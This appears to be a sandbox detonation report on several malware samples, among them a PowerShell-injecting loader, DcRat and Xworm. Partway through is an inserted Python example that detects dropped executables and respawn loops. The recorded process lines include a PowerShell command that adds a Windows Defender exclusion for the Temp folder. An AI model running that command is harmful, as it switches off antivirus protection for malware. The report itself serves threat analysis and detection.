memory/3036-58-0x00007FFCAECC0000-0x00007FFCAF781000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win7-20240903-en
Max time kernel
118s
Max time network
120s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\197a511efac9c171f1a50077e9ae4a32.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\197a511efac9c171f1a50077e9ae4a32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1052 wrote to memory of 2724 | N/A | C:\Users\Admin\AppData\Local\Temp\197a511efac9c171f1a50077e9ae4a32.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1052 wrote to memory of 2724 | N/A | C:\Users\Admin\AppData\Local\Temp\197a511efac9c171f1a50077e9ae4a32.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1052 wrote to memory of 2724 | N/A | C:\Users\Admin\AppData\Local\Temp\197a511efac9c171f1a50077e9ae4a32.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1052 wrote to memory of 2724 | N/A | C:\Users\Admin\AppData\Local\Temp\197a511efac9c171f1a50077e9ae4a32.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\197a511efac9c171f1a50077e9ae4a32.exe
"C:\Users\Admin\AppData\Local\Temp\197a511efac9c171f1a50077e9ae4a32.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp""
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
Files
memory/1052-0-0x000000007463E000-0x000000007463F000-memory.dmp
memory/1052-1-0x0000000000BE0000-0x0000000000F36000-memory.dmp
memory/1052-2-0x0000000074630000-0x0000000074D1E000-memory.dmp
memory/1052-4-0x0000000000320000-0x000000000032A000-memory.dmp
memory/1052-3-0x0000000000320000-0x000000000032A000-memory.dmp
memory/2724-7-0x000000006C691000-0x000000006C692000-memory.dmp
memory/2724-9-0x000000006C690000-0x000000006CC3B000-memory.dmp
memory/2724-10-0x000000006C690000-0x000000006CC3B000-memory.dmp
memory/2724-8-0x000000006C690000-0x000000006CC3B000-memory.dmp
memory/2724-11-0x000000006C690000-0x000000006CC3B000-memory.dmp
memory/2724-12-0x000000006C690000-0x000000006CC3B000-memory.dmp
memory/1052-13-0x0000000004CF0000-0x0000000004D30000-memory.dmp
memory/1052-14-0x0000000004CF0000-0x0000000004D30000-memory.dmp
memory/1052-15-0x000000007463E000-0x000000007463F000-memory.dmp
memory/1052-16-0x0000000074630000-0x0000000074D1E000-memory.dmp
memory/1052-17-0x0000000000320000-0x000000000032A000-memory.dmp
memory/1052-18-0x0000000000320000-0x000000000032A000-memory.dmp
memory/1052-19-0x0000000004CF0000-0x0000000004D30000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win10v2004-20250314-en
Max time kernel
103s
Max time network
142s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\197a511efac9c171f1a50077e9ae4a32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\197a511efac9c171f1a50077e9ae4a32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3928 wrote to memory of 5772 | N/A | C:\Users\Admin\AppData\Local\Temp\197a511efac9c171f1a50077e9ae4a32.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 3928 wrote to memory of 5772 | N/A | C:\Users\Admin\AppData\Local\Temp\197a511efac9c171f1a50077e9ae4a32.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 3928 wrote to memory of 5772 | N/A | C:\Users\Admin\AppData\Local\Temp\197a511efac9c171f1a50077e9ae4a32.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\197a511efac9c171f1a50077e9ae4a32.exe
"C:\Users\Admin\AppData\Local\Temp\197a511efac9c171f1a50077e9ae4a32.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp""
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
Files
memory/3928-0-0x0000000074FAE000-0x0000000074FAF000-memory.dmp
memory/3928-1-0x00000000008A0000-0x0000000000BF6000-memory.dmp
memory/3928-2-0x0000000074FA0000-0x0000000075750000-memory.dmp
memory/3928-3-0x0000000005640000-0x000000000565C000-memory.dmp
memory/3928-4-0x0000000074FA0000-0x0000000075750000-memory.dmp
memory/3928-5-0x0000000005ED0000-0x0000000006474000-memory.dmp
memory/5772-7-0x0000000074FA0000-0x0000000075750000-memory.dmp
memory/5772-8-0x0000000005870000-0x0000000005E98000-memory.dmp
memory/5772-6-0x0000000002E20000-0x0000000002E56000-memory.dmp
memory/5772-9-0x0000000074FA0000-0x0000000075750000-memory.dmp
memory/5772-10-0x0000000074FA0000-0x0000000075750000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_txhnjxin.nba.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5772-16-0x0000000005650000-0x0000000005672000-memory.dmp
memory/5772-21-0x0000000005EA0000-0x0000000005F06000-memory.dmp
memory/5772-22-0x0000000006060000-0x00000000060C6000-memory.dmp
memory/5772-23-0x00000000060D0000-0x0000000006424000-memory.dmp
memory/5772-24-0x0000000006020000-0x000000000603E000-memory.dmp
memory/5772-25-0x0000000006440000-0x000000000648C000-memory.dmp
memory/5772-26-0x00000000069D0000-0x0000000006A02000-memory.dmp
memory/5772-37-0x0000000074FA0000-0x0000000075750000-memory.dmp
memory/5772-38-0x0000000006980000-0x000000000699E000-memory.dmp
memory/5772-27-0x000000006D230000-0x000000006D27C000-memory.dmp
memory/5772-39-0x0000000074FA0000-0x0000000075750000-memory.dmp
memory/5772-40-0x00000000075D0000-0x0000000007673000-memory.dmp
memory/5772-42-0x0000000007730000-0x000000000774A000-memory.dmp
memory/5772-41-0x0000000007D70000-0x00000000083EA000-memory.dmp
memory/5772-43-0x00000000077A0000-0x00000000077AA000-memory.dmp
memory/5772-44-0x00000000079B0000-0x0000000007A46000-memory.dmp
memory/5772-45-0x0000000007930000-0x0000000007941000-memory.dmp
memory/5772-46-0x0000000007980000-0x000000000798E000-memory.dmp
memory/5772-47-0x0000000007990000-0x00000000079A4000-memory.dmp
memory/5772-48-0x0000000007A90000-0x0000000007AAA000-memory.dmp
memory/5772-49-0x0000000007A70000-0x0000000007A78000-memory.dmp
memory/5772-52-0x0000000074FA0000-0x0000000075750000-memory.dmp
memory/3928-53-0x0000000074FAE000-0x0000000074FAF000-memory.dmp
memory/3928-54-0x00000000075C0000-0x00000000075C8000-memory.dmp
memory/3928-55-0x000000000A9B0000-0x000000000A9E8000-memory.dmp
memory/3928-56-0x00000000075F0000-0x00000000075FE000-memory.dmp
memory/3928-57-0x0000000074FA0000-0x0000000075750000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win7-20240903-en
Max time kernel
122s
Max time network
124s
Command Line
Signatures
DcRat
Dcrat family
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1a4ae15ef300f51f70607edc1e8e62a3.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\1a4ae15ef300f51f70607edc1e8e62a3.exe
"C:\Users\Admin\AppData\Local\Temp\1a4ae15ef300f51f70607edc1e8e62a3.exe"
Network
Files
memory/2460-0-0x000007FEF5803000-0x000007FEF5804000-memory.dmp
memory/2460-1-0x0000000000D70000-0x0000000000F7A000-memory.dmp
memory/2460-2-0x000007FEF5800000-0x000007FEF61EC000-memory.dmp
memory/2460-3-0x00000000003D0000-0x00000000003DE000-memory.dmp
memory/2460-4-0x00000000003E0000-0x00000000003EE000-memory.dmp
memory/2460-5-0x000007FEF5800000-0x000007FEF61EC000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win10v2004-20250314-en
Max time kernel
150s
Max time network
145s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Xworm family
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1b0acebe24bf7a0fa1e25e0e9174184ad9827298b7ff75384049deed6e74c306.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
Executes dropped EXE
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
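Two signatures in this detonation are worth turning into explicit logic: "Executes dropped EXE" is a correlation between a file write and a later process start of the same path, and the Processes list that follows shows XClient.exe and Output.exe in C:\Users\Admin\AppData\Roaming restarting each other dozens of times, which is a rate signal rather than a content signal. The following is an added example of both checks over constructed events, not code from the sandbox or from the sample; the three paths are taken from this report, while the writer of the dropped files, the timestamps and the one-second restart cadence are assumptions.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Event:
    ts: float       # seconds
    kind: str       # "file_create" or "proc_create"
    actor: str      # image of the process that wrote the file / started the process
    target: str     # file path written, or image path of the new process


def _norm(path: str) -> str:
    return path.replace("/", "\\").lower()


def dropped_executables(events):
    """(writer, path) pairs where a file written earlier is later started as a
    process: the correlation behind the 'Executes dropped EXE' signature."""
    written = {}          # normalized path -> image that wrote it
    hits = set()
    for e in sorted(events, key=lambda ev: ev.ts):
        if e.kind == "file_create":
            written[_norm(e.target)] = e.actor
        elif e.kind == "proc_create":
            writer = written.get(_norm(e.target))
            if writer:
                hits.add((writer, e.target))
    return sorted(hits)


def respawn_storms(events, window=60.0, threshold=10):
    """{image: max starts inside any `window`-second span} for images started at
    least `threshold` times in such a span. Sliding window over sorted timestamps."""
    starts = defaultdict(list)
    for e in events:
        if e.kind == "proc_create":
            starts[e.target].append(e.ts)
    storms = {}
    for image, times in starts.items():
        times.sort()
        j, best = 0, 0
        for i, t in enumerate(times):
            while t - times[j] > window:
                j += 1
            best = max(best, i - j + 1)
        if best >= threshold:
            storms[image] = best
    return storms


# Constructed sample modelled on behavioral20: two writes into Roaming, then the two
# dropped binaries starting each other once per second. Writer, timestamps and
# cadence are assumptions; the paths are the report's.
DROPPER = r"C:\Users\Admin\AppData\Local\Temp\1b0acebe24bf7a0fa1e25e0e9174184ad9827298b7ff75384049deed6e74c306.exe"
XCLIENT = r"C:\Users\Admin\AppData\Roaming\XClient.exe"
OUTPUT = r"C:\Users\Admin\AppData\Roaming\Output.exe"

SAMPLE_EVENTS = [
    Event(0.0, "file_create", DROPPER, XCLIENT),
    Event(0.5, "file_create", DROPPER, OUTPUT),
    Event(1.0, "proc_create", DROPPER, XCLIENT),
    # Benign: explorer starting notepad once is neither dropped nor a storm
    Event(2.0, "proc_create", r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe"),
]
# Even i: XClient starts Output; odd i: Output starts XClient. 60 starts over 60 s.
SAMPLE_EVENTS += [
    Event(2.0 + i, "proc_create", OUTPUT if i % 2 else XCLIENT, XCLIENT if i % 2 else OUTPUT)
    for i in range(60)
]

if __name__ == "__main__":
    for writer, path in dropped_executables(SAMPLE_EVENTS):
        print("dropped and executed:", path, "written by", writer)
    for image, n in respawn_storms(SAMPLE_EVENTS).items():
        print(f"respawn storm: {image} started {n} times within 60 s")
```

The dropped-EXE correlation only needs the file-create and process-create streams to share a normalized path, so it is cheap to run continuously; the storm check is the one that exposes the loop in this detonation, where each process in the pair restarts the other faster than a host-based kill of a single PID can stop it, which is why both images have to be quarantined together rather than terminated one at a time.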
Processes
C:\Users\Admin\AppData\Local\Temp\1b0acebe24bf7a0fa1e25e0e9174184ad9827298b7ff75384049deed6e74c306.exe
"C:\Users\Admin\AppData\Local\Temp\1b0acebe24bf7a0fa1e25e0e9174184ad9827298b7ff75384049deed6e74c306.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
